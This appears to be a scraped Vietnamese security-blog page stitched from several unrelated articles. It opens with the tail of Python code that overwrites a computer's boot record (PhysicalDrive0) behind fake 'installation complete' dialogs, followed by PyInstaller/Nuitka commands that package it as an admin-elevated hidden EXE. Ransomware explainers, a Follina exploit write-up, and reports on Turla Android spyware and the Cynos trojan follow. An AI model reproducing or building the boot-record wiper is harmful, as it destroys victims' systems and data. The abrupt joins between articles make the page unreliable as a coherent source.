    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
])

def run_mbr():
    while MessageBox('Bấm "Yes để tiếp tục cài đặt" ', 'Anonyviet',MB_YESNO) == IDNO:
            continue
    sleep(3)
    if MessageBox('Đã cài đặt hoàn tất \nVui lòng khởi động lại máy để phần mềm được làm mới !', "Anonyviet"):
        pass

    anonyviet = CreateFileW(r"\\.\PhysicalDrive0", 
                          GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 
                          None, OPEN_EXISTING, 0, 0)

    WriteFile(anonyviet, ma_doc, None)
    CloseHandle(anonyviet)

run_mbr()

Để build được file Python sang EXE ( file exe này phải chạy với quyền admin nhen ) mình sẽ sử dụng Pyinstaller hoặc là Nuitka để build ra phần mềm chứa mã độc mbr:

pyinstaller --onefile --uac-admin -w FileMaDocMBRcuaBan.py

nuitka --onefile --windows-uac-admin --mingw64 --disable-console FileMaDocMBRcuaBan.py

 Và đây là kết quả !

Cách phòng chống mã độc MBR:

1. Sử dụng phần mềm diệt virus và cập nhật thường xuyên: Cài đặt phần mềm diệt virus trên máy tính của bạn và cập nhật thường xuyên để bảo vệ máy tính của bạn khỏi các mã độc MBR mới nhất.
2. Không tải xuống và cài đặt phần mềm từ các nguồn không rõ nguồn gốc: Tránh tải xuống và cài đặt phần mềm từ các trang web không rõ nguồn gốc, vì chúng có thể chứa mã độc MBR.
3. Không mở email hoặc tải xuống các tập tin từ các nguồn không rõ nguồn gốc: Mở email và tải xuống tập tin từ các nguồn không rõ nguồn gốc có thể dẫn đến sự lây lan của mã độc MBR
4. Sử dụng Firewall: Cài đặt tường lửa (Firewall) để bảo vệ máy tính của bạn khỏi các cuộc tấn công mạng.
5. Sử dụng phần mềm Anti-Rootkit: Cài đặt phần mềm Anti-Rootkit, nó sẽ giúp phát hiện và loại bỏ mã độc MBR.
6. Sử dụng mật khẩu truy cập: Sử dụng mật khẩu để bảo vệ BIOS và MBR khỏi các tấn công truy cập trái phép.
7. Không để ổ đĩa cứng trống trải: Nếu ổ đĩa cứng của bạn trống trải, các hacker có thể sử dụng để lưu trữ mã độc MBR.
8. Sử dụng phần mềm Backup: Sử dụng phần mềm Backup để sao lưu dữ liệu quan trọng và ổ đĩa cứng, nếu có bất kỳ điều gì xảy ra thì bạn có thể phục hồi lại dữ liệu của mình.

Cách giải quyết khi bị nhiễm mã độc MBR trên Windows

Bước 1: Tải bộ cài đặt Windows từ trang web của Microsoft. Bạn có thể tải về bản cài đặt tương ứng với phiên bản Windows bạn muốn cài đặt, ví dụ như Windows 10.

Bước 2: Tạo một đĩa hoặc USB khởi động từ bộ cài đặt Windows bạn vừa tải về. Bạn có thể sử dụng một phần mềm tạo USB khởi động như Rufus để thực hiện việc này.

Bước 3: Chọn thiết bị khởi động từ đĩa hoặc USB mà bạn đã tạo ở bước trên. Để làm điều này, bạn cần truy cập vào BIOS hoặc UEFI firmware và thay đổi thiết lập khởi động.

Bước 4: Khởi động máy tính từ đĩa hoặc USB khởi động. Sau khi khởi động, bạn sẽ thấy màn hình cài đặt Windows.

Bước 5: Làm theo các hướng dẫn trên màn hình để cài đặt Windows. Bạn có thể chọn loại cài đặt tùy chỉnh để xóa toàn bộ dữ liệu trên ổ cứng.

Bước 6: Khi quá trình cài đặt hoàn tất, bạn cần cài đặt các trình điều khiển và các ứng dụng mà bạn sử dụng thường xuyên. Bạn có thể tải chúng từ trang web của nhà sản xuất hoặc từ Microsoft Store.

Câu hỏi thường gặp

MBR là gì và tại sao nó lại dễ bị tấn công?

MBR (Master Boot Record) là 512 byte đầu tiên trên ổ cứng, chứa thông tin về phân vùng và mã khởi động. Do vị trí quan trọng và cấu trúc tương đối đơn giản, MBR dễ bị tấn công bởi mã độc, dẫn đến lỗi khởi động hoặc mất dữ liệu.

Việc tạo mã độc MBR có mục đích gì trong bài viết này?

Bài viết này nhằm mục đích giáo dục và nghiên cứu về an ninh mạng, không khuyến khích việc tạo hoặc sử dụng mã độc. Việc trình bày cách tạo mã độc giúp người đọc hiểu rõ hơn về cách thức hoạt động của các cuộc tấn công và biện pháp phòng ngừa.

Làm thế nào để bảo vệ máy tính khỏi mã độc tấn công MBR?

Cần thường xuyên sao lưu dữ liệu quan trọng, sử dụng phần mềm diệt virus cập nhật, và giữ cho hệ điều hành và phần mềm luôn được cập nhật bản vá bảo mật. Sử dụng các công cụ kiểm tra và sửa chữa MBR nếu nghi ngờ bị nhiễm mã độc.

Ransomware hoạt động như thế nào?

Đặc điểm nổi bật của ransomware là nó được sử dụng như một công cụ tống tiền và có nhiều cách khác nhau để tội phạm mạng sử dụng loại phần mềm độc hại này để giành quyền truy cập vào thiết bị của nạn nhân. Một trong những cách phổ biến nhất là email lừa đảo — nạn nhân được gửi email có đính kèm file độc hại và sẽ lây nhiễm vào máy tính của nạn nhân khi chúng được mở.

Sau khi chiếm đoạt thành công máy tính của nạn nhân, những kẻ tấn công tiếp tục mã hóa một số hoặc tất cả các tệp của người dùng, như tài liệu Word, PDF, hình ảnh, cơ sở dữ liệu,… Phần mềm tống tiền cũng có thể khai thác toàn bộ lỗ hổng mạng, có thể lây lan sang các hệ thống khác và thậm chí trên toàn bộ tổ chức.

Vào cuối cuộc tấn công, tin tặc sẽ gửi cho nạn nhân một tin nhắn giải thích rằng các tệp của họ hiện đã bị mã hóa và chỉ có thể được giải mã nếu trả tiền chuộc. Tiền chuộc thường được yêu cầu dưới hình thức thanh toán Bitcoin không theo dõi được để trả cho kẻ tấn công.

Mục tiêu của Ransomware?

Mục tiêu ransomware có thể là người tiêu dùng cá nhân, các doanh nghiệp vừa và nhỏ hoặc các tổ chức doanh nghiệp lớn hơn. Việc bọn tội phạm chọn mục tiêu như thế nào thường phụ thuộc vào cơ hội. Ví dụ: họ có thể nhắm đến các nhóm có đội bảo mật nhỏ hơn như các trường đại học do khả năng bảo mật yếu hơn và mức độ chia sẻ tệp cao.

Một mục tiêu phổ biến khác là các tổ chức có nhiều khả năng trả tiền chuộc trong thời gian ngắn hơn. Các cơ quan chính phủ, ngân hàng, công ty luật và cơ sở y tế đều thuộc loại này, vì họ có thể cần quyền truy cập ngay lập tức vào các tệp khách hàng nhạy cảm và sẽ sẵn sàng trả tiền chuộc hơn nếu đổi lại sự im lặng về các vi phạm tài chính của tổ chức đó.

Cuối cùng, tội phạm thường nhắm mục tiêu vào các tổ chức công ty lớn với hy vọng kiếm được nhiều tiền hơn. Các cuộc tấn công ransomware trong danh mục này thường tập trung vào các doanh nghiệp ở Anh, Hoa Kỳ và Canada do số lượng sử dụng máy tính cá nhân cao.

Các loại Ransomware

Trong khi có vô số chủng loại ransomware, hầu hết các cuộc tấn công thuộc hai loại chính: Crypto ransomware và locker ransomware.

• Crypto ransomware hoạt động bằng cách mã hóa các tệp máy tính nhạy cảm của nạn nhân và yêu cầu tiền chuộc trước khi có thể khôi phục tệp.
• Locker ransomware không mã hóa các tập tin. Thay vào đó, nó xâm phạm các chức năng máy tính cơ bản và khóa nạn nhân hoàn toàn khỏi thiết bị của họ cho đến khi trả tiền chuộc.

Mức độ nghiêm trọng do một cuộc tấn công ransomware gây ra sẽ phụ thuộc vào biến thể của ransomware đang được sử dụng và các phương pháp giải quyết sẽ khác nhau tùy thuộc vào loại ransomware.

Ví dụ về ransomware

Mặc dù ransomware chỉ mới xuất hiện được vài thập kỷ, nhưng nó đã có những bước phát triển nhanh chóng trong 5 năm qua nhờ sự tiến bộ của các phương thức thanh toán không thể theo dõi như Bitcoin. Dưới đây là một số vụ tấn công kinh khủng nhất từ trước đến nay.

1. CryptoLocker

CryptoLocker là một trong những cuộc tấn công ransomware trên diện rộng đầu tiên sử dụng mã hóa khóa công khai. Cuộc tấn công năm vào 2013 này đã đặt nền móng cho ransomware hiện tại và đã xâm nhập hơn 500.000 máy từ năm 2013 đến năm 2014. Thanh toán được yêu cầu trả dưới dạng Bitcoin và vào thời điểm đó, các chuyên gia tin rằng phần mềm độc hại đang được sử dụng là không thể xâm nhập.

Đến năm 2014, một công ty bảo mật cuối cùng cũng có quyền truy cập vào một máy chủ liên quan đến cuộc tấn công và khôi phục thành công các khóa mã hóa, nhưng những kẻ tấn công vẫn cố gắng tống tiền gần 3 triệu USD trước khi chúng phá sản.

2.WannaCry

WannaCry là một cuộc tấn công năm 2017, lây lan trên 150 quốc gia nhằm vào các lỗ hổng bảo mật trong phần mềm Windows. Cuộc tấn công đã lây nhiễm cho 230.000 thiết bị trên toàn thế giới, khóa người dùng khỏi máy tính của họ cho đến khi trả tiền chuộc bằng Bitcoin.

Cuộc tấn công WannaCry hoạt động bằng cách khai thác một lỗ hổng hệ điều hành được phát hiện là đã xuất hiện từ rất lâu trước khi cuộc tấn công xảy ra và sự kiện này đã làm sáng tỏ hệ thống bảo mật lỗi thời. Trên toàn cầu, WannaCry gây ra thiệt hại tài chính trung bình 4 tỷ USD.

3. NotPetya

NotPetya là một cuộc tấn công toàn cầu năm 2017 chủ yếu nhắm vào Ukraine. Ban đầu, nó được cho là một dòng Petya ransomware mới – một dạng phần mềm độc hại lây nhiễm vào máy tính mục tiêu, mã hóa dữ liệu và đòi tiền chuộc bằng bitcoin để khôi phục tệp. Tuy nhiên, NotPetya sau đó được coi là một dòng ransomware hoàn toàn mới được gọi là wiper, với mục đích duy nhất là phá hủy dữ liệu bị xâm phạm thay vì trả lại để đòi tiền chuộc.

4. BadRabbit

BadRabbit là một dòng ransomware đã lây nhiễm cho các công ty truyền thông trên khắp nước Nga và Đông Âu vào năm 2019. Cuộc tấn công được thực hiện thông qua việc phát tán bản cập nhật Adobe Flash giả mạo để lây nhiễm thiết bị của nạn nhân khi tải xuống, hướng họ đến trang thanh toán nơi đòi tiền chuộc bằng Bitcoin. Không giống như cuộc tấn công NotPetya, BadRabbit sẽ giải mã file nếu nhận được khoản tiền chuộc.

Cách bảo vệ bản thân khỏi Ransomware

Như với bất kỳ mối đe dọa an ninh mạng nào, các phương pháp phòng ngừa hầu như luôn tốt hơn là tìm cách chữa trị khi đã quá muộn. Thực hiện theo các phương pháp phòng ngừa tốt nhất dưới đây để giảm thiểu nguy cơ bị tấn công.

• Sao lưu dữ liệu: Cách tốt nhất để tránh bị mã hóa các tệp nhạy cảm là sao lưu dữ liệu định kỳ. Tốt nhất là thực hiện việc này trên đám mây hoặc bằng ổ cứng ngoài. Nếu bạn gặp phải một cuộc tấn công, bạn chỉ cần xóa thiết bị của mình và cài đặt lại các tệp bằng bản sao lưu đó.
• Bảo vệ email: các chiến dịch lừa đảo qua email là một trong những phương tiện phổ biến nhất để phát tán ransomware, vì vậy việc bảo mật email của bạn là rất quan trọng. Ở cấp độ tổ chức, việc trang bị cho nhân viên của bạn khả năng nhận ra các email đáng ngờ có thể ngăn chặn một cuộc tấn công trước khi nó có thể gây ra bất kỳ thiệt hại nào.
• Luôn cập nhật hệ thống: Thường xuyên cập nhật phần mềm của bạn là một trong những cách đơn giản nhất để ngăn chặn bất kỳ cuộc tấn công mạng nào. Mỗi bản cập nhật phần mềm có sẵn đều giảm thiểu các lỗ hổng bảo mật mới được tìm thấy, khiến những kẻ tấn công khó khai thác phần mềm lỗi thời hơn.
• Không bao giờ nhấp vào các liên kết đáng ngờ: Cho dù đó là tệp đính kèm trong email hay một liên kết được tìm thấy trên web, đừng bao giờ nhấp vào các liên kết trong thư rác hoặc các trang web không xác định. Chỉ cần nhấp vào một liên kết độc hại cũng có thể bắt đầu quá trình tải xuống tự động, lây nhiễm vào máy tính của bạn ngay lập tức.
• Không tiết lộ thông tin cá nhân: Không bao giờ trả lời email hoặc tin nhắn văn bản từ một nguồn không xác định yêu cầu thông tin cá nhân, ngay cả khi họ tự nhận là người mà bạn tin tưởng.
• Sử dụng phần mềm bảo mật: Cài đặt phần mềm bảo mật đáng tin cậy là một trong những cách dễ nhất để giữ an toàn cho dữ liệu của bạn. Để tăng cường khả năng bảo vệ, hãy chọn một phần mềm cung cấp nhiều hơn các tính năng chống virus— một số có khả năng phát hiện mối đe dọa đa nền tảng có thể giữ an toàn cho tất cả các thiết bị của bạn.

Cách đối phó với các cuộc tấn công bằng Ransomware

Nếu bạn đã bị tấn công bằng ransomware, thì thời gian là điều cốt yếu và điều quan trọng nhất là phải hành động càng nhanh càng tốt. Bạn có thể thực hiện một số bước để giảm thiểu thiệt hại.

• Cách ly thiết bị bị nhiễm virus: Để đảm bảo an toàn cho mạng, bộ nhớ dùng chung và các thiết bị khác của bạn, quan trọng là bạn phải ngắt kết nối thiết bị bị ảnh hưởng khỏi mạng càng sớm càng tốt. Điều này có thể ngăn các thiết bị được kết nối khác bị nhiễm virus.
• Đánh giá tất cả các thiết bị được kết nối khác: Việc cô lập thiết bị bị nhiễm không phải lúc nào cũng đảm bảo rằng phần mềm tống tiền không tồn tại ở nơi khác trên mạng của bạn. Để ngăn nó lây lan, hãy kiểm tra tất cả các thiết bị được kết nối khác và ngắt kết nối bất kỳ thiết bị nào đang hoạt động đáng ngờ.
• Báo cáo với cơ quan chức năng: Ransomware là một loại tội phạm giống như bất kỳ loại tội phạm nào khác cần được báo cáo cho cơ quan thực thi pháp luật. Các nhà chức trách liên quan cũng có quyền truy cập vào các công cụ để truy xuất dữ liệu bị đánh cắp và xác định vị trí của những kẻ tấn công.

Ransomware có thể bị loại bỏ không?

Việc loại bỏ ransomware tùy thuộc vào loại ransomware mà bạn đang xử lý và bạn sẽ cần phải cài đặt phần mềm bảo mật trước khi bị tấn công — nhưng trong một số trường hợp, bạn có thể xóa được. Đây là những gì bạn có thể làm:

• Ngắt kết nối thiết bị bị nhiễm khỏi Internet càng sớm càng tốt để ngăn phần mềm tống tiền phát tán.
• Quét các tệp độc hại và xóa chúng bằng phần mềm bảo mật. Nếu ransomware khóa màn hình máy tính, thì có thể không thực hiện được.
• Lấy lại quyền truy cập vào dữ liệu của bạn bằng công cụ giải mã được kết nối với phần mềm bảo mật. Bước này sẽ phụ thuộc vào phần mềm bảo mật bạn có.
• Khôi phục các tệp đã mất của bạn nếu bạn có bản sao lưu dữ liệu bên ngoài.

Nếu bạn không thể thực hiện các bước trên, tùy chọn còn lại duy nhất là đặt lại máy tính của bạn về cài đặt gốc. Bạn có thể đọc bài viết này để biết cách reset win bằng usb.

Ransomware gây ra mối đe dọa đáng kể cho người tiêu dùng cũng như các công ty, và những kẻ tấn công đang thực hiện các cuộc tấn công ngày càng tinh vi khi công nghệ tiến bộ. Khi nói đến việc bảo vệ bản thân, phòng ngừa hầu như luôn tốt hơn là tìm cách chữa sau cuộc tấn công — điều này có nghĩa là giáo dục bản thân về ransomware và cách sử dụng thiết bị một cách an toàn là điều cần thiết để ngăn chặn mọi cuộc tấn công. Để tăng cường bảo mật, hãy đảm bảo có phần mềm chống virus trên tất cả các thiết bị của bạn để giảm nguy cơ lây nhiễm.

Câu hỏi thường gặp

Ransomware là gì và nó hoạt động như thế nào?

Ransomware là phần mềm độc hại mã hóa tệp của bạn, khóa bạn khỏi hệ thống, và đòi tiền chuộc để giải mã. Nó thường lây lan qua email lừa đảo hoặc các liên kết độc hại.

Tôi có thể bị ảnh hưởng bởi ransomware như thế nào?

Bạn có thể bị nhiễm ransomware bằng cách mở tệp đính kèm email độc hại, nhấp vào liên kết độc hại, hoặc thông qua các lỗ hổng bảo mật trong phần mềm của bạn.

Làm thế nào để tôi bảo vệ mình khỏi ransomware?

Sao lưu dữ liệu thường xuyên, cập nhật phần mềm, sử dụng phần mềm diệt virus, và tránh nhấp vào các liên kết hoặc tệp đính kèm đáng ngờ là những bước quan trọng để bảo vệ mình.

Có thể nói đây là lỗ hổng zero-day trong Microsoft Office vì hiện nay chưa có bản vá, các Hacker đang tích cực khai thác trong các tài liệu Word đính kèm mã độc để thực thi mã từ xa trên PC của nạn nhân.

Lỗ hổng được đặt tên là “Follina”, được dùng để khai thác cách các sản phẩm Office hoạt động với MSDT (Công cụ chẩn đoán lỗi của Microsoft), lỗ hổng này có thể được khai thác ngay cả khi macro bị vô hiệu hóa trong Microsoft Office.

Theo một số thông tin, lỗ hổng ban đầu đã được báo cáo cho nhóm bảo mật của Microsoft vào ngày 12 tháng 4 năm 2022, sau khi các File Word giả mạo hãng thông tấn Sputnik của Nga phát tán đến người dùng.

9 ngày sau, Microsoft đã quyết định rằng lỗ hổng này không liên quan đến bảo mật nên không giải quyết. Thật đáng tiếc, đó dường như là một quyết định sai lầm của đội ngũ bảo mật của Microsoft. Nhà nghiên cứu bảo mật Kevin Beaumont báo cáo lỗ hổng này hoạt động trên các phiên bản mới nhất của Microsoft Office, ngay cả khi đã được cập nhật phiên bản mới nhất.

Lỗ hổng “Follina” được đưa ra ánh sáng sau khi một nhóm nghiên cứu an ninh mạng độc lập có tên nao_sec phát hiện ra một tài liệu Word (“05-2022-0438.doc“) được tải lên VirusTotal từ một địa chỉ IP ở Belarus.

“Lỗ hổng này sử dụng liên kết bên ngoài của Word để tải HTML và sau đó sử dụng scheme ‘ms-msdt’ để thực thi mã PowerShell”. File Word có đính kèm mã độc sử dụng tính remote template của Word để tìm nạp File HTML từ máy chủ, sau đó sử dụng Schema URI “ms-msdt://” để tải mã độc về thực thi trên máy tính nạn nhân

Sở dĩ có tên gọi như vậy là do mẫu độc hại tham chiếu đến 0438, đây là mã vùng của Follina, một đô thị ở thành phố Treviso của Ý.
Bạn có thể xem video PoC dưới đây:

MS-MSDT "Follina" Office click-to-hack. pic.twitter.com/v0DOkQhZjq

— John Hammond (@_JohnHammond) May 30, 2022

Hiện  tác giả John Hammond đã công bố file PoC trên Github, bạn nào muốn nghiên cứu có thể tải về kiểm thử. Mình không khuyến khích sử dụng phương thức này để gửi các File Word có đính kèm mã độc cho người khác, như vậy sẽ vi phạm pháp luật.

Cách ngăn chặn lỗ hổng Follina

Hiện nay các phiên bản Office 2013, 2016, 2019, 2021 và Microsoft 365 trên cả Windows 10 và Windows 11 đều bị lỗ hổng này và Microsoft chưa có bản vá. Cách khắc phục tạm thời là tắt chế độ Preview trong Windows Explorer bằng cách  Mở Windows Explorer -> View -> tắt chỗ Preview Pane đi

– Tải file unregister-msdt.reg sau đó mở vào file để thiết lập và áp dụng trong Regedit. Nếu hiện lên cửa sổ User Account Control thì chọn Yes.

– Khi nhận file Word từ người khác hay tải từ Internet nên kiểm tra bằng Virustotal xem có bị đính kèm mã độc không?

– Nếu nhận được một file Word, Excel hay PPT hãy tải lên Google Docs, Sheets hoặc Slides để xem Online thay vì dùng phần mềm Microsoft Office.

Tin tổng hợp

Nhóm hack Turla có thể là thủ phạm đằng sau việc triển khai phần mềm gián điệp khét tiếng tấn công các thiết bị Android. Theo báo cáo mới nhất, các chuyên gia tin rằng nó đến từ các tin tặc do nhà nước Nga bảo trợ.

Ngoài việc sử dụng phần mềm độc hại này cho hoạt động gián điệp, mã độc này cũng có thể có quyền truy cập vào các tính năng khác của điện thoại của bạn, bao gồm internet, máy ảnh, tin nhắn…

Phần mềm gián điệp Turla Android?

Các nhà nghiên cứu từ Lab52 đã xác định một APK độc hại [VirusTotal] có tên “Process Manager” hoạt động như phần mềm gián điệp Android, tải thông tin máy bị lây nhiễm về máy chủ của Hacker.

Mặc dù không rõ phần mềm gián điệp được phát tán như thế nào nhưng sau khi được cài đặt, Process Manager cố gắng ẩn trên thiết bị Android bằng biểu tượng hình bánh răng, giả vờ là một thành phần hệ thống.

Trong lần khởi chạy đầu tiên, ứng dụng sẽ nhắc người dùng cho phép nó sử dụng 18 quyền sau:

• Truy cập vị trí
• Truy cập trạng thái mạng
• Truy cập trạng thái WiFi
• Caemera
• Foreground service
• Internet
• Sửa đổi cài đặt âm thanh
• Đọc nhật ký cuộc gọi
• Đọc danh bạ
• Đọc bộ nhớ ngoài
• Ghi bộ nhớ ngoài
• Đọc trạng thái điện thoại
• Đọc tin nhắn SMS
• Nhận trạng thái khởi động thành công
• Gửi tin nhắn
• Nhật ký mở máy

Các quyền này là ảnh hưởng nghiêm trọng đối với quyền riêng tư vì nó cho phép ứng dụng lấy vị trí của thiết bị, gửi và đọc SMS, truy cập bộ nhớ, chụp ảnh bằng Camera và ghi âm.

Không rõ liệu phần mềm độc hại có lạm dụng dịch vụ Trợ năng của Android để tự cấp quyền cho chính nó hay nó lừa người dùng chấp thuận yêu cầu.

Sau khi nhận được quyền, phần mềm gián điệp sẽ xóa biểu tượng của nó và chạy trong nền chỉ với một thông báo đầu tiên sau đó biến mất đi.

Thông tin được thiết bị thu thập, bao gồm danh sách, nhật ký, SMS, bản ghi và thông báo sự kiện, được gửi ở định dạng JSON đến máy chủ của nhóm Hacker IP 82.146.35 [.] 240.

Phương thức phát tán file APK chưa được xác định, nhưng nếu đó là của nhóm Turla, họ thường sử dụng kỹ thuật social engineering, lừa đảo, tấn công lỗ hổng, v.v.

Trường hợp lừa đảo nhận thưởng để tải App

Trong khi nghiên cứu ứng dụng, nhóm Lab52 đã phát hiện rằng họ tải các mã độc xuống thiết bị và tìm thấy một trường hợp ứng dụng được tải trực tiếp từ Cửa hàng Play.

Ứng dụng được đặt tên là “Roz Dhan: Kiếm tiền mặt bằng Wallet” và đây là một ứng dụng phổ biến (10.000.000 lượt tải xuống) có hệ thống giới thiệu (ref) để nhận tiền. Ứng dụng này nghe có vẻ quá tốt vì người dùng có thể kiếm được tiền thông qua hệ thống giới thiệu.

Theo các nhà nghiên cứu an ninh mạng, khá kỳ lạ khi thực hiện mánh lới quảng cáo này vì mục tiêu chính của Hacker là theo dõi nạn nhân và đánh cắp thông tin.

Ngăn chặn phần mềm độc hại

Người dùng thiết bị Android nên xem lại các quyền ứng dụng đã cấp, điều này sẽ khá dễ dàng trên các phiên bản từ Android 10 trở lên và thu hồi những quyền không liên quan đến ứng dụng. Ví dụ đọc sms, dùng camera, ghi âm….

Ngoài ra, bắt đầu từ Android 12, hệ điều hành sẽ đẩy các chỉ báo khi máy ảnh hoặc micrô đang hoạt động, vì vậy nếu những dấu hiệu này xuất hiện không có nghĩa là phần mềm gián điệp đang ẩn trong thiết bị của bạn.

Những công cụ này đặc biệt nguy hiểm khi nhúng vào bên trong các IoT chạy các phiên bản Android cũ, âm thầm đào tiền ảo tử điện thoại của bạn mà bạn không hề hay biết.

Trojan “Android.Cynos.7.origin” này được tìm thấy trong 190 trò chơi và có khoảng 9 triệu 3 trăm lượt tải xuống. Trojan này được thiết kế đặc biệt để lấy dữ liệu như số điện thoại di động và các dữ liệu khác cho người đứng sau.

Dữ Liệu Đã Thu Thập

Tất cả những trò chơi chứa Trojan này chủ yếu nhắm vào đối tượng là trẻ em vì trẻ em là mục tiêu dễ dàng để tiếp cận vì bọn trẻ không thể nhận thức được cái này độc hại, gây hại cho nên rất dễ dàng để có thể đánh cắp dữ liệu. Sau khi người dùng cấp quyền cho các trò chơi này thì dữ liệu sẽ được thu thập và được gửi đến một remote server.

Dữ liệu đã thu thập:

• Số điện thoại của bạn
• Vị trí của thiết bị dựa trên GPS, dữ liệu di động và điểm truy cập Wifi
• Các thông tin của mạng di động ( sim): mã mạng, mã quốc gia , ID GSM, mã vùng GSM quốc tế.
• Các thông số của thiết bị.
• Một số phiên bản của nó có chức năng khá mạnh: chúng gửi SMS tốn tiền, chặn SMS đến, tải xuống và khởi chạy các mô-đun bổ sung, đồng thời tải xuống và cài đặt các ứng dụng khác. Chức năng chính của phiên bản được các nhà phân tích phần mềm độc hại phát hiện là thu thập thông tin về người dùng và thiết bị của họ và hiển thị quảng cáo.

Các ứng dụng bị ảnh hưởng

Có khoảng 190 trò chơi trên Huawei AppGallery có trojan tích hợp trong một số danh mục bao gồm:

1. Simulators
2. Platforms
3. Arcades
4. Strategies
5. Shooters and others

Tổng cộng có hơn 9 triệu người dùng đã tải xuống các trò chơi này. Một số trò chơi này nhắm mục tiêu đến người dùng Nga, trong khi một số trò chơi khác nhắm mục tiêu đến khán giả Trung Quốc hoặc quốc tế.

Hiện tại thì tất cả các trò chơi bị dính Trojan này đã được Huawei xóa khỏi kho ứng dụng AppGallery. Tuy nhiên, nếu bạn đang sử dụng một chiếc điện thoại nào đó thuộc Huawei hoặc tải game nào đó trên app store của  Huawei hoặc tải apk và vô tình bọn cung cấp apk lấy từ bên AppGallery và bạn không chắc mình có bị dính Trojan này hay không, thì bạn có thể xem một số trò chơi bị dính ở bên dưới:

• “[Команда должна убить боеголовку]” với hơn 8000 lượt cài đặt.
• “Cat game room” với hơn427000 lượt cài đặt.
• “Drive school simulator” với hơn 142000 lượt cài đặt.
• “[快点躲起来]” với hơn 2000000 lượt cài đặt.